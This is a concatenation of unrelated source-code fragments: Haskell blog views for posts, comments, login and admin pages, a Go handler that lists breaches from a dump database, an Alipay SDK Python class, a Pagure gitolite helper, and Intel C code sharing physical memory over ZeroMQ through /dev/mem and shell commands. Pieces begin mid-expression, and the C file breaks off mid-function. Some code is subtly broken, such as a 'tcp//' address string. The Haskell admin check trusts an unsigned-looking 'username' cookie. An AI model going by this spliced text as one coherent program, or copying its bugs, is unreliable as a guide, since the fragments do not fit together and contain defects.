(allGET req) t3 = setAttribute "currentpath" (urlEncode (Settings.root_url ++ pathInfo req ++ (if not $ null qs then "?" ++ qs else ""))) t2 t4 = setAttribute "allpostsfeedurl" allPostsFeedUrl t3 rendered = render t4 in buildResponse [ addContent rendered ] utf8HtmlResponse -- | Custom 404 response return404 :: View return404 req = do t <- get_template "notfound" return $ Just $ with (standardResponseTT req t) [ setStatus 404 ] return403 :: View return403 req = do t <- get_template "forbidden" return $ Just $ with (standardResponseTT req t) [ setStatus 403 ] -- Feed utilities feedResponse :: Feed -> IO (Maybe Response) feedResponse feed = return $ Just $ with (textBasedResponse "application/atom+xml" "UTF-8") [ addContent $ utf8 $ showTopElement $ xmlFeed feed ] ---- Views -- View for the main page mainIndex :: View mainIndex req = do let curpage = getPage req cn <- connect (posts,more) <- getRecentPosts cn curpage Settings.post_page_size cats <- getCategoriesBulk cn posts t <- get_template "index" return $ Just $ standardResponseTT req $ (renderf t ("posts", map postTemplateInfo posts) ("categories", map (map categoryTemplateInfo) cats) ("paginglinks", pagingLinks indexUrl curpage more) ) -- Feed for all posts allPostsFeedView req = do cn <- connect (posts, more) <- getRecentPosts cn 1 Settings.feed_post_page_size feedResponse $ allPostsFeed posts allCommentsView req = do let curpage = getPage req cn <- connect (commentsAndPosts,more) <- getRecentComments cn curpage Settings.comment_page_size t <- get_template "comments" return $ Just $ standardResponseTT req $ (renderf t ("comments", map (commentTemplateInfo . fst) commentsAndPosts) ("urls", map (uncurry commentUrl) commentsAndPosts) ("titles", map (P.title . snd) commentsAndPosts) ("paginglinks", pagingLinks allCommentsUrl curpage more) ("atomfeedurl", allCommentsFeedUrl) ("atomfeedtitle", "All comments in this blog") ) allCommentsFeedView req = do cn <- connect (commentsAndPosts,more) <- getRecentComments cn 1 Settings.feed_comment_page_size feedResponse $ allCommentsFeed commentsAndPosts -- | View to help with debugging debug :: String -> View debug path req = return $ Just $ buildResponse [ addContent $ utf8 "Path:\n" , addContent $ utf8 path , addContent $ utf8 "\n\nRequest:\n" , addContent $ utf8 $ show req ] utf8TextResponse -- | View that performs redirect to main page postsRedirectView :: View postsRedirectView req = return $ Just $ redirectResponse indexUrl -- | View that shows an overview of categories categoriesView :: View categoriesView req = do cn <- connect cats <- getCategories cn t <- get_template "categories" let categories = [ (c, categoryUrl c) | c <- cats ] return $ Just $ standardResponseTT req $ (renderf t ("categories", categories) ("hasCategories", not $ null cats) ) -- | View that shows posts for an individual category categoryView :: String -> View categoryView slug req = do let curpage = getPage req cn <- connect mcat <- getCategoryBySlug cn slug case mcat of Nothing -> return404 req Just cat -> do (posts,more) <- getPostsForCategory cn cat (getPage req) Settings.post_page_size cats <- getCategoriesBulk cn posts t <- get_template "category" return $ Just $ standardResponseTT req $ (renderf t ("category", cat) ("posts", map postTemplateInfo posts) ("categories", map (map categoryTemplateInfo) cats) ("paginglinks", pagingLinks (categoryUrl cat) curpage more) ("atomfeedurl", categoryPostsFeedUrl cat) ("atomfeedtitle", LB.pack "All posts in category " `LB.append` Ct.name cat) ) categoryPostsFeedView slug req = do cn <- connect mcat <- getCategoryBySlug cn slug case mcat of Nothing -> return404 req Just cat -> do (posts,more) <- getPostsForCategory cn cat 1 Settings.feed_post_page_size feedResponse $ categoryPostsFeed cat posts -- | View that shows individual post postView :: String -> View postView slug req = do cn <- connect mp <- getPostBySlug cn slug case mp of Nothing -> return404 req Just post -> do (commentStage, commentData, commentErrors, commentExtra) <- handleUserComment cn post req cats <- getCategoriesForPost cn post comments <- getCommentsForPost cn post related <- getRelatedPosts cn post cats t <- get_template "post" return $ Just $ standardResponseTT req $ (renderf t ("post", postTemplateInfo post) ("commentPreview", commentStage == CommentPreview) ("commentAccepted", commentStage == CommentAccepted) ("commentInvalid", commentStage == CommentInvalid) ("newComment", commentTemplateInfo commentData) ("commentErrors", commentErrors) ("categories", map categoryTemplateInfo cats) ("comments", map commentTemplateInfo comments) ("hasComments", not $ null comments) ("related", map postTemplateInfo related) ("hasRelated", not $ null related) ("commentData", commentData) ("formatWidget", X.toHtml $ formatWidgetForComment commentData) ("commentExtra", commentExtra) ("atomfeedurl", postCommentFeedUrl post) ("atomfeedtitle", "All comments on this post") ("editpageurl", adminEditPostUrl post) ) where handleUserComment cn post req = case requestMethod req of "POST" -> do creds <- getCredentials req (commentData, commentErrors, commentExtra) <- validateComment cn creds (getPOST req) post if null commentErrors then if isJust (getPOST req "submit") then do addComment cn commentData return (CommentAccepted, emptyComment, [], commentExtra) -- Just assume 'preview' if not 'submit' else return (CommentPreview, commentData, commentErrors, commentExtra) else return (CommentInvalid, commentData, commentErrors, commentExtra) _ -> do commentExtra <- initialCommentExtra req return (NoComment, emptyComment, [], commentExtra) postCommentFeedView slug req = do cn <- connect mp <- getPostBySlug cn slug case mp of Nothing -> return404 req Just post -> do comments <- getCommentsForPost cn post feedResponse $ postCommentFeed comments post -- | View that displays a login form and handles logging in loginView :: View loginView req = do cn <- connect loginView' cn req -- | Testable version of loginView loginView' cn req = case requestMethod req of "POST" -> do (loginData, loginErrors) <- validateLogin (getPOST req) cn if null loginErrors then do ts <- getTimestamp let loginCookies = createLoginCookies loginData ts let redirectUrl = getGET req "r" `captureOrDefault` adminMenuUrl return $ Just $ (redirectResponse redirectUrl) `with` (map addCookie loginCookies) else do t <- loginTemplate return $ Just $ standardResponseTT req $ loginPage t loginData loginErrors _ -> do t <- loginTemplate return $ Just $ standardResponseTT req $ loginPage t emptyLoginData ([] :: [(String,String)]) where loginPage t loginData loginErrors = (renderf t ("loginInvalid", not $ null loginErrors) ("loginErrors", loginErrors) ("loginData", loginData) ) loginTemplate = get_template "login" -- | Delete auth cookies and redirect. logoutView req = let redirectUrl = getGET req "r" `captureOrDefault` indexUrl in return $ Just $ deleteCookie "username" $ redirectResponse redirectUrl -- -- Admin views -- -- Category editing is very simple and doesn't require -- much validation. adminMenu :: View adminMenu req = do t <- get_template "admin_menu" return $ Just $ standardResponseTT req $ (renderf t ("pagetitle", "Blog admin - menu") ("adminNewPostUrl", Links.adminNewPostUrl) ("adminPostsUrl", Links.adminPostsUrl) ("adminCategoriesUrl", Links.adminCategoriesUrl) ) adminPosts req = do t <- get_template "admin_posts" let curpage = getPage req cn <- connect (posts,more) <- getRecentPosts cn curpage Settings.admin_post_page_size return $ Just $ standardResponseTT req $ (renderf t ("pagetitle", "Edit posts") ("posts", map postTemplateInfo posts) ("paginglinks", pagingLinks Links.adminPostsUrl curpage more) ) -- | View that handles all editing of categories (add/edit/delete) adminCategories req = do cn <- connect t <- get_template "admin_categories" -- handle deletion if "delete" in POST vars -- handle adding/editing if "save" in POST vars message <- handlePost req cn categories <- getCategories cn return $ Just $ standardResponseTT req $ (renderf t ("categories", categories) ("message", message) ("showMessage", length message > 0) ) where handlePost req cn = if requestMethod req == "POST" then if isJust (getPOST req "save") then let catid = (getPOST req "catid") `captureOrDefault` 0 :: Int in if catid == 0 then do let ct = Ct.newCategory (getPOST req "name" `captureOrDefault` "") addCategory cn ct return "Category added" else do Just ct <- getCategoryById cn catid let ct2 = ct { Ct.name = utf8 (getPOST req "name" `captureOrDefault` "") } updateCategory cn ct2 return ("Category " ++ show catid ++ " saved") else if isJust (getPOST req "delete") then let catid = (getPOST req "categories") `captureOrDefault` 0 :: Int in do deleteCategory cn catid return ("Category " ++ show catid ++ " deleted") else return "" else return "" -- | View that handles editing an existing blog post adminEditPost post_id req = do cn <- connect m_post <- getPostById cn post_id case m_post of Just p -> adminEditPost' p False cn req Nothing -> return404 req -- | View that handles adding a new blog post adminNewPost req = do cn <- connect adminEditPost' emptyPost True cn req adminEditPost' post isNew cn req = do categories <- getCategories cn postCategories <- if isNew then return [] else getCategoriesForPost cn post case requestMethod req of "GET" -> output post (map Ct.uid postCategories) categories "start" [] "POST" -> do let mode = head $ map fst $ filter snd $ [ ("submit", hasPOST req "submit") , ("delete", hasPOST req "delete") -- use preview as default, for simplicity , ("preview", True) ] if mode == "delete" then do deletePost cn (P.uid post) return $ Just $ redirectResponse adminMenuUrl else do (postData, postCatIds, postErrors) <- validatePost req post if null postErrors then if mode == "submit" then do if isNew then do -- Set timestamp here, because we don't want to do it in -- validatePost (we would need to pass in isNew) ts <- getTimestamp let newPost = postData { P.timestamp = ts } addPost cn newPost postCatIds else updatePost cn postData postCatIds return $ Just $ redirectResponse adminMenuUrl else do -- mode == "preview" output postData postCatIds categories mode postErrors else -- invalid output postData postCatIds categories "invalid" postErrors where output :: P.Post -> [Int] -> [Ct.Category] -> String -> [(String, String)] -> IO (Maybe Response) output postData postCatIds categories mode errors = do t <- get_template "admin_post" return $ Just $ standardResponseTT req $ (renderf t ("post", postData) ("categoriesWidget", X.toHtml $ categoriesWidgetForPost postCatIds categories) ("formatWidget", X.toHtml $ formatWidgetForPost postData) ("isNew", isNew) ("pagetitle", if isNew then "Add post" else "Edit post") ("mode", mode) ("errors", errors) ("showErrors", not $ null errors) ("showPreview", mode == "preview") ) -- Admin AJAX -- TODO - proper JSON objects simpleMessage msg = buildResponse [ addContent $ utf8 msg ] utf8TextResponse success = simpleMessage "success" failure = simpleMessage "failure" adminCommentVisible req = do let visible = getPOST req "visible" `captureOrDefault` False withValidComment req (\cn commentId -> setCommentVisible cn commentId visible) adminCommentResponse req = do let response = getPOST req "response" `captureOrDefault` "" :: String let formattedResponse = getFormatter Plaintext $ response withValidComment req (\cn commentId -> setCommentResponse cn commentId formattedResponse) return $ Just $ simpleMessage formattedResponse -- TODO - proper error handling adminCommentDelete req = do withValidComment req deleteComment -- Utility that pulls out common functionality of adminComment* withValidComment req action = do let commentId = getPOST req "id" `captureOrDefault` 0 :: Int if commentId <= 0 then return $ Just $ failure else do cn <- connect action cn commentId return $ Just success addSpamWordView = withSpamWord addSpamWord deleteSpamWordView = withSpamWord deleteSpamWord withSpamWord action req = do let word = getPOST req "word" `captureOrDefault` "" if null word then return $ Just $ failure else do cn <- connect action cn word return $ Just success -- Authentication createLoginCookies loginData timestamp = let username = fromJust $ Map.lookup "username" loginData expires = Just $ toUTCTime $ TOD (toInteger timestamp + Settings.login_session_length) 0 in [ standardCookie { cookieName = "username" , cookieValue = username , cookieExpires = expires } ] timeout = 3600 * 24 * 10 -- 10 days type Credentials = Maybe String -- | Return the username if logged in, otherwise Nothing -- -- Relies on secure cookies middleware getCredentials :: Request -> IO Credentials getCredentials req = do return $ getCookieVal req "username" -- Decorators -- | Decorate a view function with this to limit the view -- to users who are 'admins' adminRequired :: View -> View adminRequired view = \req -> do creds <- getCredentials req case creds of Just n -> if n `elem` Settings.admin_usernames then view req else return403 req Nothing -> return403 req -- Utilities getPage req = (getGET req "p") `captureOrDefault` 1 :: Int
// Return a JSON response of all the breaches in the database func ListBreaches(w http.ResponseWriter, r *http.Request) { mysess := mdb.Copy() c := mysess.DB("steamer").C("dumps") var results []string err := c.Find(nil).Distinct("breach", &results) if err != nil { fmt.Fprintf(os.Stderr, "breach search error: %v", err) http.Error(w, "Error searching breaches", http.StatusInternalServerError) return } json, err := json.Marshal(results) if err != nil { fmt.Fprintf(os.Stderr, "json encoding error: %v", err) http.Error(w, "Error json encoding", http.StatusInternalServerError) return } fmt.Fprintf(w, string(json)) }
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * from alipay.aop.api.domain.IoTBPaaSKeyValue import IoTBPaaSKeyValue from alipay.aop.api.domain.IoTBPaaSKeyValue import IoTBPaaSKeyValue class IoTBPaaSMerchantOrderItemInfo(object): def __init__(self): self._attrs = None self._item_name = None self._item_num = None self._item_price = None self._specs = None @property def attrs(self): return self._attrs @attrs.setter def attrs(self, value): if isinstance(value, list): self._attrs = list() for i in value: if isinstance(i, IoTBPaaSKeyValue): self._attrs.append(i) else: self._attrs.append(IoTBPaaSKeyValue.from_alipay_dict(i)) @property def item_name(self): return self._item_name @item_name.setter def item_name(self, value): self._item_name = value @property def item_num(self): return self._item_num @item_num.setter def item_num(self, value): self._item_num = value @property def item_price(self): return self._item_price @item_price.setter def item_price(self, value): self._item_price = value @property def specs(self): return self._specs @specs.setter def specs(self, value): if isinstance(value, list): self._specs = list() for i in value: if isinstance(i, IoTBPaaSKeyValue): self._specs.append(i) else: self._specs.append(IoTBPaaSKeyValue.from_alipay_dict(i)) def to_alipay_dict(self): params = dict() if self.attrs: if isinstance(self.attrs, list): for i in range(0, len(self.attrs)): element = self.attrs[i] if hasattr(element, 'to_alipay_dict'): self.attrs[i] = element.to_alipay_dict() if hasattr(self.attrs, 'to_alipay_dict'): params['attrs'] = self.attrs.to_alipay_dict() else: params['attrs'] = self.attrs if self.item_name: if hasattr(self.item_name, 'to_alipay_dict'): params['item_name'] = self.item_name.to_alipay_dict() else: params['item_name'] = self.item_name if self.item_num: if hasattr(self.item_num, 'to_alipay_dict'): params['item_num'] = self.item_num.to_alipay_dict() else: params['item_num'] = self.item_num if self.item_price: if hasattr(self.item_price, 'to_alipay_dict'): params['item_price'] = self.item_price.to_alipay_dict() else: params['item_price'] = self.item_price if self.specs: if isinstance(self.specs, list): for i in range(0, len(self.specs)): element = self.specs[i] if hasattr(element, 'to_alipay_dict'): self.specs[i] = element.to_alipay_dict() if hasattr(self.specs, 'to_alipay_dict'): params['specs'] = self.specs.to_alipay_dict() else: params['specs'] = self.specs return params @staticmethod def from_alipay_dict(d): if not d: return None o = IoTBPaaSMerchantOrderItemInfo() if 'attrs' in d: o.attrs = d['attrs'] if 'item_name' in d: o.item_name = d['item_name'] if 'item_num' in d: o.item_num = d['item_num'] if 'item_price' in d: o.item_price = d['item_price'] if 'specs' in d: o.specs = d['specs'] return o
def generate_user_key_files(): gitolite_home = pagure_config.get("GITOLITE_HOME", None) if gitolite_home: users = pagure.lib.query.search_user(flask.g.session) for user in users: pagure.lib.query.update_user_ssh( flask.g.session, user, None, pagure_config.get("GITOLITE_KEYDIR", None), update_only=True, ) pagure.lib.git.generate_gitolite_acls(project=None)
<gh_stars>1-10 /* * Copyright 2019 Intel(R) Corporation (http://www.intel.com) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <inttypes.h> #include <sys/types.h> #include <sys/queue.h> #include <sys/time.h> #include <sys/mman.h> #include <string.h> #include <sys/queue.h> #include <stdarg.h> #include <errno.h> #include <getopt.h> #include <signal.h> #include <stdbool.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <net/if.h> #include <netinet/in.h> #include <stdio.h> #include <assert.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <malloc.h> #include <sys/param.h> #include <ctype.h> #include <zmq.h> #include "vca_mem.h" #ifdef ENCLAVE void __assert_fail(const char * assertion, const char * file, unsigned int line, const char * function) { } #endif #ifndef ENCLAVE #define ZMQ_SEND ((int (*) (void *, void *, size_t, int)) zmq_send) #define ZMQ_RECV zmq_recv //((int (*) (void *, void *, size_t, int)) zmq_recv) const char *host_vca_ip_array[2][VCA_SOCKETS] = { { //Host side IPs "172.31.1.254", "172.31.2.254", "172.31.3.254", "172.31.4.254", "172.31.5.254", "172.31.6.254" }, { //VCA side IPs "172.31.1.1", "172.31.2.1", "172.31.3.1", "172.31.4.1", "172.31.5.1", "172.31.6.1" } }; void *context = NULL; void *c = NULL; int get_entry(PagemapEntry *entry, int pagemap_fd, uintptr_t vaddr) { size_t nread; ssize_t ret; uint64_t data; nread = 0; while (nread < sizeof(data)) { ret = pread(pagemap_fd, &data, sizeof(data), (vaddr / sysconf(_SC_PAGE_SIZE)) * sizeof(data) + nread); nread += ret; if (ret <= 0) { return 1; } } entry->pfn = data & (((uint64_t)1 << 54) - 1); entry->soft_dirty = (data >> 54) & 1; entry->file_page = (data >> 61) & 1; entry->swapped = (data >> 62) & 1; entry->present = (data >> 63) & 1; return 0; } unsigned long virt_to_phys_user(uintptr_t vaddr) { char pagemap_file[BUFSIZ]; int pagemap_fd; pid_t pid = getpid(); snprintf(pagemap_file, sizeof(pagemap_file), "/proc/%ju/pagemap", (uintmax_t)pid); pagemap_fd = open(pagemap_file, O_RDONLY); if (pagemap_fd < 0) { return -1; } PagemapEntry entry; if (get_entry(&entry, pagemap_fd, vaddr)) { return -1; } close(pagemap_fd); //printf("pa base 0x%lx vaddr % 4096 ix 0x%lx\n",entry.pfn * sysconf(_SC_PAGE_SIZE),(vaddr % sysconf(_SC_PAGE_SIZE))); return ((unsigned long)((entry.pfn * sysconf(_SC_PAGE_SIZE)) + (vaddr % sysconf(_SC_PAGE_SIZE)))); } void* get_contiguous__2MB(void) { int offset; unsigned long phys = 0, base_phys = 0; void *vaddr; vaddr = memalign(_2MB,_2MB); assert(madvise(vaddr,_2MB, MADV_HUGEPAGE) == 0); assert(mlock(vaddr,_2MB) == 0); base_phys = virt_to_phys_user((unsigned long)vaddr); for (offset=0;offset<_2MB;offset += PAGE_SIZE) { phys = virt_to_phys_user((unsigned long)vaddr + offset); if (phys != (base_phys + offset )) { free(vaddr); return NULL; } } assert(vaddr != NULL); memset((void *)vaddr,0x00,REMOTE_RING_SIZE); return vaddr; } void * get_contiguous__4KB(void) { void * vaddr = NULL; vaddr = memalign(PAGE_SIZE,PAGE_SIZE); assert(vaddr != NULL); assert(mlock(vaddr,PAGE_SIZE) == 0); memset(vaddr,0x00,PAGE_SIZE); return vaddr; } int get_local_platform_type(void) { return system("lsmod | grep 'vca_mgr ' > /dev/null"); } // TODO: assumes single digit number of CPUs (max 3 SGX cards) int get_card_self_socket_number(void) { char hostname[256]; int hn_len = 0; int card_cpu = 0, card_id = 0; hostname[255] = '\0'; gethostname(hostname,255); hn_len = strnlen(hostname, 256); card_cpu = isdigit(hostname[hn_len-1]) ? hostname[hn_len-1] - '0' : 0; card_id = isdigit(hostname[hn_len-2]) ? hostname[hn_len-2] - '0' : 0; // return(((card_cpu/10)*3) + (card_cpu%10)); return card_id * 3 + card_cpu; //Card socket can only see 1 host socket so /tmp/pipe_0 will always be used } void execute(const char *fmt, ...) { char command[MAX_COMMAND_LEN] = {0,}; va_list args; va_start(args, fmt); vsnprintf(command,MAX_COMMAND_LEN, fmt, args); va_end(args); //printf("Executing %s\n",command); int i = system(command); } void initialize_system(const char * ip, const char * port, int * socket) { int rc = 0; char ipname[256]; // is the system already initialized? if(!c && !context) { // form the ip name and port as a string if(ip && port > 0) { snprintf(ipname, 256, "tcp://%s:%s", ip, port); } else { // no ip or port specified, use defaults from the table if(*socket > -1 && *socket < 6) ip = host_vca_ip_array[get_local_platform_type()][*socket]; else ip = host_vca_ip_array[get_local_platform_type()][get_card_self_socket_number()]; snprintf(ipname, 256, "tcp//%s:%s", ip, (port) ? port : VCA_HOST_PORT); } // create zmq context context = zmq_ctx_new (); if(*socket == -1 || *socket == -3) { // running as client -> connect to host server c = zmq_socket (context, ZMQ_REQ); rc = zmq_connect (c, ipname); if (rc != 0) { perror("Failed to connect to server"); exit(1); } } else { // running as host -> bind on port clients connect to c = zmq_socket (context, ZMQ_REP); rc = zmq_bind (c, ipname); if (rc != 0) { perror("Failed to bind port on host"); exit(1); } } } // exchange socket numbers when needed if (*socket == -3) { uint32_t s = get_card_self_socket_number(); rc = zmq_send(c, &s, sizeof(s), 0); if(rc != sizeof(s)) { perror("Failed to exchange socket numbers"); exit(1); } rc = zmq_recv(c, &s, sizeof(s), 0); if(rc != sizeof(s) && s != get_card_self_socket_number()) { perror("Failed to get ack from host for sock num"); exit(1); } } else if (*socket == -2) { // accept arbitrary socket number -> fix it for this run uint32_t s = 0; rc = zmq_recv(c, &s, sizeof(s), 0); if(rc != sizeof(s)) { perror("Failed to exchange socket numbers"); exit(1); } *socket = s; rc = zmq_send(c, &s, sizeof(s), 0); if(rc != sizeof(s)) { perror("Failed to send ack to node for sock num"); exit(1); } } } int request_sharing(transfer_mapping * map, int (*send_recv)(void *, void *, size_t, int)) { int rc = 0; rc = send_recv(c, map, sizeof(transfer_mapping), 0); if(rc != sizeof(transfer_mapping)) { perror("Failed to share memory"); return rc; } return 0; } int send_recv_mapping(transfer_mapping * in, transfer_mapping * out, int socket) { int rc = 0; transfer_mapping error_map = { .socket = -255 }; if (get_local_platform_type() == HOST) { rc = request_sharing(out, ZMQ_RECV); // ensure we talk to the correct socket if (out->socket != socket) { request_sharing(&error_map, ZMQ_SEND); return 1; // retry wrong socket connected } rc |= request_sharing(in, ZMQ_SEND); } else { // for enclaves (clients) rc = request_sharing(in, ZMQ_SEND); // first send then recv rc |= request_sharing(out, ZMQ_RECV); if (out->socket == -255) { printf("Host decliened sharing memory\n"); exit(1); } } return rc; } int share_local_memory(int socket, void *ptr, unsigned long size, int mapping_type) { unsigned long physical_base = (unsigned long)virt_to_phys_user((unsigned long)ptr); transfer_mapping tq, out; int rc = 0; if(c == NULL) { printf("No connection, initialize system first\n"); exit(1); } assert(physical_base != 0); if (socket == -1) socket = get_card_self_socket_number(); assert(host_vca_ip_array[!get_local_platform_type()][socket] != NULL); assert(ptr != NULL); assert(size % PAGE_SIZE == 0); assert((mapping_type == READ) || (mapping_type == WRITE)); tq.physical_addr = physical_base; tq.size = size; tq.mapping_type = mapping_type; tq.socket = socket; do { rc = send_recv_mapping(&tq, &out, socket); } while (rc); printf("Channel Established..channel phys addr 0x%lx size 0x%lx type %d socket %d\n",physical_base,size,mapping_type, socket); return 0; } int recv_remote_data(int * socket, unsigned long *remote_physical, unsigned long *size, int *mapping_type) { char command[MAX_COMMAND_LEN] = {0,}; char result[BUFSIZ] = {0,}; transfer_mapping in, map; FILE *fp; int rc = 0; if(c == NULL) { printf("No connection, initialize system first\n"); exit(1); } if (*socket == -1) *socket = get_card_self_socket_number(); do { rc = send_recv_mapping(&in, &map, *socket); } while (rc); *remote_physical = map.physical_addr; *size = map.size; *mapping_type = map.mapping_type; *socket = map.socket; printf("Received \"0x%lx 0x%lx %d\" on socket %d\n",*remote_physical,*size,*mapping_type, *socket); return 0; } unsigned long get_local_mapping(int socket, int mapping_number ) { char command[MAX_COMMAND_LEN] = {0,}; char result[BUFSIZ] = {0,}; unsigned long remote_base, size, local_base; FILE *fp; if(get_local_platform_type() != HOST) socket = 0; snprintf(command,MAX_COMMAND_LEN, "cat /sys/kernel/sgx5_mapper_%d/map%d",socket,mapping_number); printf("local mapping %s\n", command); if ((fp = popen(command, "r")) == NULL) { printf("Error opening pipe!\n"); return -1; } assert(fgets(result, BUFSIZ, fp)); sscanf(result,"0x%lx 0x%lx 0x%lx\n",&remote_base, &size, &local_base); assert((remote_base % PAGE_SIZE) == 0); assert((size % PAGE_SIZE) == 0); assert((local_base % PAGE_SIZE) == 0); return local_base; } int setup_mtrr_mappings(unsigned long base, unsigned long size, int remote_access_type) { unsigned long i = PAGE_SIZE; char caching_type[BUFSIZ] = {0,}; assert((base % PAGE_SIZE) == 0); assert((size % PAGE_SIZE) == 0); assert((remote_access_type == READ) || (remote_access_type == WRITE)); while(i < size) i = i<<1; size = i; base = base & ((~size)+1); //Find the MTRR base that is a multiple of size if (remote_access_type == READ) strncpy(caching_type, "write-through", BUFSIZ); //OR WRITE-BACK based on access requirement if (remote_access_type == WRITE) strncpy(caching_type, "write-combining", BUFSIZ); printf("Calculated base=0x%lx size=0x%lx type=%s mapping for MTRR\n",base,size,caching_type); execute("echo \"base=0x%lx size=0x%lx type=%s\" > /proc/mtrr",base,size,caching_type); return 0; } unsigned long setup_local_mappings(int socket, int mapping_number, unsigned long base, unsigned long size) { assert((base % PAGE_SIZE) == 0); assert((size % PAGE_SIZE) == 0); if (socket == -1) socket = get_card_self_socket_number(); if(get_local_platform_type() != HOST) socket = 0; printf("sgx5_mapper_%d/map%d init\n", socket, mapping_number); execute("echo \"0x00 0x00\" > /sys/kernel/sgx5_mapper_%d/map%d",socket,mapping_number); execute("echo \"0x%lx 0x%lx\" > /sys/kernel/sgx5_mapper_%d/map%d",base,size,socket,mapping_number); base = get_local_mapping(socket, mapping_number); return base; } void* map_phys_memory(unsigned long phys, unsigned long size) { int fd; void* ptr; if ((fd = open("/dev/mem", O_RDWR )) == -1) { perror("open"); exit(1); } ptr = mmap(0, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, phys); assert(ptr != NULL); close(fd); return ptr; } void* map_remote_memory(transfer_mapping * map, int socket, unsigned long request_size, int mapping_number) { unsigned long local_physical, local_size, page_offset; if (get_local_platform_type() != HOST) //Workaround for bug in detectig CARD socket = -1; assert(map->size % PAGE_SIZE == 0); assert(map->size == request_size); assert(mapping_number < MAX_MAPPINGS_PER_VCA_SOCKET); assert((map->mapping_type == READ) || (map->mapping_type == WRITE)); page_offset = map->physical_addr & 0xFFF; if (page_offset != 0) { map->physical_addr = map->physical_addr - page_offset; local_size = map->size + PAGE_SIZE; } else { local_size = map->size; } local_physical = setup_local_mappings(socket,mapping_number, map->physical_addr, local_size); // printf("Channel Established... channel phys addr 0x%lx size 0x%lx type %d socket %d\n",local_physical + page_offset, local_size, mapping_type, get_card_self_socket_number()); return (void *)((unsigned long)map_phys_memory(local_physical, local_size) + page_offset); } int allocate_ring(void ** addr_ptr, void * (*alloc) (), int size, transfer_mapping * map, int socket, int rem_prod) { int i = 0; *addr_ptr = alloc(); for (i=0; i< MAX_CHANNELS_PER_VCA_SOCKET; i++) { ((unsigned long *)*addr_ptr)[rem_prod + 2*i] = (i * MAX_ITEMS); ((unsigned long *)*addr_ptr)[rem_prod + (2*i) + 1] = i * MAX_ITEMS; } map->physical_addr = (unsigned long)virt_to_phys_user((unsigned long) *addr_ptr); map->size = size; map->mapping_type = REMOTE_WILL_WRITE; map->socket = socket; assert(map->physical_addr != 0); assert(map->size % PAGE_SIZE == 0); assert(map->mapping_type == READ || map->mapping_type == WRITE); return 0; } queue_object *init_dequeue(int socket) { int i = 0, rc = 0; transfer_mapping in, out; if(c == NULL) { printf("No connection, initialize system first\n"); exit(1); } if (get_local_platform_type() == HOST) { printf("Local Platform is HOST\n"); assert(socket < VCA_SOCKETS); } else { printf("Local Platform is CARD\n"); socket = get_card_self_socket_number(); } assert(socket >= 0 && host_vca_ip_array[!get_local_platform_type()][socket] != NULL); queue_object *q = malloc(sizeof(queue_object)); assert(q != NULL); if (allocate_ring(&q->ring_2mb, get_contiguous__2MB, _2MB, &in, socket, REMOTE_PRODUCER)) { free(q); return NULL; } do { rc = send_recv_mapping(&in, &out, socket); } while(rc); q->ring_4kb = map_remote_memory(&out, socket, PAGE_SIZE, DEQUEUE_MAP_NUMBER); q->queue_type = DEQUEUE_MAP_NUMBER; q->socket = socket; return q; } queue_object * init_enqueue(int socket) { int i = 0, rc = 0; transfer_mapping in, out; if(c == NULL) { printf("No connection, initialize system first\n"); exit(1); } if (get_local_platform_type() == HOST) { printf("Local Platform is HOST\n"); assert(socket < VCA_SOCKETS); } else { printf("Local Platform is CARD\n"); socket = get_card_self_socket_number(); } queue_object *q = malloc(sizeof(queue_object)); assert(q != NULL); if (allocate_ring(&q->ring_4kb, get_contiguous__4KB, PAGE_SIZE, &in, socket, 0)) { free(q); return NULL; } do { rc = send_recv_mapping(&in, &out, socket); } while (rc); q->ring_2mb = map_remote_memory(&out,socket, _2MB, ENQUEUE_MAP_NUMBER); q->queue_type = ENQUEUE_MAP_NUMBER; q->socket = socket; printf("Init split enqueue done : _2MB pointer %p 4KB pointer %p \n",q->ring_2mb, q->ring_4kb); return q; } void free_queue(queue_object *q) { assert(q != NULL); if (q->queue_type == DEQUEUE_MAP_NUMBER) { assert(q->ring_2mb != NULL); free(q->ring_2mb); } else if (q->queue_type == ENQUEUE_MAP_NUMBER) { assert(q->ring_4kb != NULL); free(q->ring_4kb); } free(q); } void *init_host_task_system(void *opq, const char * ip, const char * port, int * socket) { task_queue_opaque *opaque = opq; unsigned int i = 0; assert(*socket < VCA_SOCKETS); if (opaque == NULL) { opaque = (task_queue_opaque *) malloc(sizeof(task_queue_opaque)); assert(opaque != NULL); memset(opaque, 0, sizeof(task_queue_opaque)); opaque->next_recv_channel = 0; opaque->next_submit_channel = 0; opaque->next_recv_socket = 0; opaque->next_submit_socket = 0; opaque->total_sockets = 0; for(i = 0; i < VCA_SOCKETS; i++) opaque->active_sockets[i] = -1; } initialize_system(ip, port, socket); // may update the socket, depending on who connects opaque->active_sockets[opaque->total_sockets++] = *socket; printf("\nInitializing communication with worker on socket %d\n",*socket); opaque->tx_q_objs[*socket] = init_enqueue(*socket); assert(opaque->tx_q_objs[*socket] != NULL); opaque->rx_q_objs[*socket] = init_dequeue(*socket); assert(opaque->rx_q_objs[*socket] != NULL); return opaque; } void *init_vca_task_system(const char * ip, const char * port, int * socket) { task_queue_opaque *opaque; opaque = (task_queue_opaque *) malloc(sizeof(task_queue_opaque)); memset(opaque, 0, sizeof(task_queue_opaque)); assert(opaque != NULL); initialize_system(ip, port, socket); opaque->rx_q_objs[0] = init_dequeue(-1); assert(opaque->rx_q_objs[0] != NULL); opaque->tx_q_objs[0] = init_enqueue(-1); assert(opaque->tx_q_objs[0] != NULL); return opaque; } void deinit_vca_task_system(void *opq) { int i = 0; task_queue_opaque *opaque = opq; assert(opaque != NULL); printf("\nTearing down communication with workers\n"); for (i = 0; i < VCA_SOCKETS; i++) { if(opaque->rx_q_objs[i]) free_queue(opaque->rx_q_objs[i]); if(opaque->tx_q_objs[i]) free_queue(opaque->tx_q_objs[i]); } free(opaque); zmq_close(c); zmq_ctx_destroy(context); } #endif //NOT ENCLAVE MODE int s_variable_multi_enqueue(queue_object *queue_obj, void *source, unsigned int total_elements, 